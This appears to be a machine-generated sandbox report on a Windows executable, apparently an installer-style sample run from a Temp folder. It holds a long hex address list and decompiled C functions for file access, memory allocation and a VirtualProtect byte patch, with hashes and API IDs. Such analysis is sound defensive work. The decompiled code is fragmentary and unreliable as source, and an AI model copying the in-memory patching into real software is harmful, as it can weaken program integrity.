                                                                                                                          0x004063b2
                                                                                                                          0x004063b9
                                                                                                                          0x004063be
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040644c
                                                                                                                          0x0040644c
                                                                                                                          0x00406450
                                                                                                                          0x004067ee
                                                                                                                          0x00000000
                                                                                                                          0x004067ee
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406460
                                                                                                                          0x00406463
                                                                                                                          0x00406469
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646e
                                                                                                                          0x00406471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406041
                                                                                                                          0x00406041
                                                                                                                          0x00406045
                                                                                                                          0x004067b2
                                                                                                                          0x00000000
                                                                                                                          0x004067b2
                                                                                                                          0x0040604b
                                                                                                                          0x0040604e
                                                                                                                          0x00406051
                                                                                                                          0x00406055
                                                                                                                          0x00406058
                                                                                                                          0x0040605e
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406063
                                                                                                                          0x00406066
                                                                                                                          0x00406066
                                                                                                                          0x00406069
                                                                                                                          0x0040606c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406072
                                                                                                                          0x00406078
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040607e
                                                                                                                          0x0040607e
                                                                                                                          0x00406082
                                                                                                                          0x00406085
                                                                                                                          0x00406088
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x0040608f
                                                                                                                          0x00406092
                                                                                                                          0x00406094
                                                                                                                          0x0040609a
                                                                                                                          0x0040609d
                                                                                                                          0x004060a0
                                                                                                                          0x004060a3
                                                                                                                          0x004060a6
                                                                                                                          0x004060a9
                                                                                                                          0x004060ac
                                                                                                                          0x004060c8
                                                                                                                          0x004060cb
                                                                                                                          0x004060ce
                                                                                                                          0x004060d1
                                                                                                                          0x004060d8
                                                                                                                          0x004060dc
                                                                                                                          0x004060de
                                                                                                                          0x004060e2
                                                                                                                          0x004060ae
                                                                                                                          0x004060ae
                                                                                                                          0x004060b2
                                                                                                                          0x004060ba
                                                                                                                          0x004060bf
                                                                                                                          0x004060c1
                                                                                                                          0x004060c3
                                                                                                                          0x004060c3
                                                                                                                          0x004060e5
                                                                                                                          0x004060ec
                                                                                                                          0x004060ef
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060fa
                                                                                                                          0x004060fa
                                                                                                                          0x004060fe
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x00406104
                                                                                                                          0x00406107
                                                                                                                          0x0040610a
                                                                                                                          0x0040610e
                                                                                                                          0x00406111
                                                                                                                          0x00406117
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x0040611c
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x00406125
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406127
                                                                                                                          0x0040612a
                                                                                                                          0x0040612d
                                                                                                                          0x00406130
                                                                                                                          0x00406133
                                                                                                                          0x00406136
                                                                                                                          0x00406139
                                                                                                                          0x0040613c
                                                                                                                          0x0040613f
                                                                                                                          0x00406142
                                                                                                                          0x00406145
                                                                                                                          0x0040615d
                                                                                                                          0x00406160
                                                                                                                          0x00406163
                                                                                                                          0x00406166
                                                                                                                          0x00406166
                                                                                                                          0x00406169
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00406353
                                                                                                                          0x00406353
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406690
                                                                                                                          0x00406617
                                                                                                                          0x00406614

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                          • Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
                                                                                                                          • Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                          • Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00401B06(void* __ebx, void* __edx) {
                                                                                                                          				intOrPtr _t7;
                                                                                                                          				void* _t8;
                                                                                                                          				void _t11;
                                                                                                                          				void* _t13;
                                                                                                                          				void* _t21;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				void* _t37;
                                                                                                                          
                                                                                                                          				_t27 = __ebx;
                                                                                                                          				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
                                                                                                                          				_t30 =  *0x40af50; // 0x0
                                                                                                                          				if(_t7 == __ebx) {
                                                                                                                          					if(__edx == __ebx) {
                                                                                                                          						_t8 = GlobalAlloc(0x40, 0x404); // executed
                                                                                                                          						_t34 = _t8;
                                                                                                                          						_t4 = _t34 + 4; // 0x4
                                                                                                                          						E004059FF(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
                                                                                                                          						_t11 =  *0x40af50; // 0x0
                                                                                                                          						 *_t34 = _t11;
                                                                                                                          						 *0x40af50 = _t34;
                                                                                                                          					} else {
                                                                                                                          						if(_t30 == __ebx) {
                                                                                                                          							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                                                                          						} else {
                                                                                                                          							_t2 = _t30 + 4; // 0x4
                                                                                                                          							E004059DD(_t33, _t2);
                                                                                                                          							_push(_t30);
                                                                                                                          							 *0x40af50 =  *_t30;
                                                                                                                          							GlobalFree();
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L15;
                                                                                                                          				} else {
                                                                                                                          					while(1) {
                                                                                                                          						_t7 = _t7 - 1;
                                                                                                                          						if(_t30 == _t27) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						_t30 =  *_t30;
                                                                                                                          						if(_t7 != _t27) {
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t30 == _t27) {
                                                                                                                          								break;
                                                                                                                          							} else {
                                                                                                                          								_t32 = _t30 + 4;
                                                                                                                          								E004059DD(0x409b50, _t30 + 4);
                                                                                                                          								_t21 =  *0x40af50; // 0x0
                                                                                                                          								E004059DD(_t32, _t21 + 4);
                                                                                                                          								_t24 =  *0x40af50; // 0x0
                                                                                                                          								_push(0x409b50);
                                                                                                                          								_push(_t24 + 4);
                                                                                                                          								E004059DD();
                                                                                                                          								L15:
                                                                                                                          								 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t37 - 4));
                                                                                                                          								_t13 = 0;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          					_push(0x200010);
                                                                                                                          					_push(E004059FF(_t27, _t30, _t33, _t27, 0xffffffe8));
                                                                                                                          					E0040529E();
                                                                                                                          					_t13 = 0x7fffffff;
                                                                                                                          				}
                                                                                                                          				L17:
                                                                                                                          				return _t13;
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32 ref: 00401B75
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B87
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                          • Opcode ID: 2dc775666dca31206916f57334fb0a9f74be6216eb206d4775a60ee4480347cc
                                                                                                                          • Instruction ID: dedcc356a049729cc32aa0533657a7b943fc31f5ec42b7739970f76d43a2a4df
                                                                                                                          • Opcode Fuzzy Hash: 2dc775666dca31206916f57334fb0a9f74be6216eb206d4775a60ee4480347cc
                                                                                                                          • Instruction Fuzzy Hash: D221A8B2604202DBD710FBA4DE8595F73A4FB44328724453BF606F32D0EB78A8119B6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          
                                                                                                                          				 *0x10004038 = _a4;
                                                                                                                          				if(_a8 == 1) {
                                                                                                                          					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
                                                                                                                          					 *0x1000404c = 0xc2;
                                                                                                                          					 *0x1000403c = 0;
                                                                                                                          					 *0x10004044 = 0;
                                                                                                                          					 *0x10004054 = 0;
                                                                                                                          					 *0x10004048 = 0;
                                                                                                                          					 *0x10004040 = 0;
                                                                                                                          					 *0x1000404e = 0;
                                                                                                                          				}
                                                                                                                          				return 1;
                                                                                                                          			}




                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000294E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID: `gxt
                                                                                                                          • API String ID: 544645111-3883184993
                                                                                                                          • Opcode ID: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                          • Instruction ID: 48d6293a520ab1310b80528f385a012c899c9e0ceb66e9e696cbd892b99779f9
                                                                                                                          • Opcode Fuzzy Hash: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                          • Instruction Fuzzy Hash: 1BE0AEF15092A0DEF360DF688CC47023EE4A3983C5B03842AE348F6269EB3841448B19
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 100012CB
                                                                                                                          • GetLastError.KERNEL32 ref: 100013D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorFileLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1214770103-0
                                                                                                                          • Opcode ID: e37e7e391b3a2b8b5636dc6aebf24869d58b81a53228d5294debfeeb9962e7db
                                                                                                                          • Instruction ID: f07c43787ce958523a2b1e991860d2c35ff6be18a2ffa2491c02e46e3495c162
                                                                                                                          • Opcode Fuzzy Hash: e37e7e391b3a2b8b5636dc6aebf24869d58b81a53228d5294debfeeb9962e7db
                                                                                                                          • Instruction Fuzzy Hash: B75183FA904214DFFB20DFA4DC8279977A4EB443D4F21842AFA04E721DDB34A990CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E004056B4(CHAR* _a4, long _a8, long _a12) {
                                                                                                                          				signed int _t5;
                                                                                                                          				void* _t6;
                                                                                                                          
                                                                                                                          				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                          				asm("sbb ecx, ecx");
                                                                                                                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                          				return _t6;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 004056B8
                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                          • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                                                          • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                          • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405695(CHAR* _a4) {
                                                                                                                          				signed char _t3;
                                                                                                                          
                                                                                                                          				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                          				if(_t3 != 0xffffffff) {
                                                                                                                          					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                                          				}
                                                                                                                          				return _t3;
                                                                                                                          			}




                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004056AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                          • Instruction ID: 6114cdacef20a61ffb1e354697c2a54f95ff97830a0005cd613603337fba2c3c
                                                                                                                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                          • Instruction Fuzzy Hash: 72C04CB1808501BBD6015B24DF0D81F7B66EB51321B508F35F56DE00F1C7355CA6DA1A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040304E(void* _a4, long _a8) {
                                                                                                                          				int _t6;
                                                                                                                          				long _t10;
                                                                                                                          
                                                                                                                          				_t10 = _a8;
                                                                                                                          				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                                                                                          				if(_t6 == 0 || _a8 != _t10) {
                                                                                                                          					return 0;
                                                                                                                          				} else {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                          • Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
                                                                                                                          • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                          • Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403080(long _a4) {
                                                                                                                          				long _t2;
                                                                                                                          
                                                                                                                          				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                                                                                          				return _t2;
                                                                                                                          			}




                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,00007DE4), ref: 0040308E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                          • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                                          • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                          • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 27%
                                                                                                                          			E10001000(intOrPtr _a8, intOrPtr _a16) {
                                                                                                                          				long _t5;
                                                                                                                          				void* _t6;
                                                                                                                          
                                                                                                                          				 *0x10004058 = _a8;
                                                                                                                          				 *0x1000405c = _a16;
                                                                                                                          				_t5 = E100017FE();
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					_t6 = GlobalAlloc(0x40, _t5); // executed
                                                                                                                          					_push(_t6);
                                                                                                                          				} else {
                                                                                                                          					_push(_t5);
                                                                                                                          				}
                                                                                                                          				return E10001825();
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 10001021
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761449716-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E10001541() {
                                                                                                                          				void* _t1;
                                                                                                                          
                                                                                                                          				_t1 = GlobalAlloc(0x40,  *0x10004058); // executed
                                                                                                                          				return _t1;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761449716-0
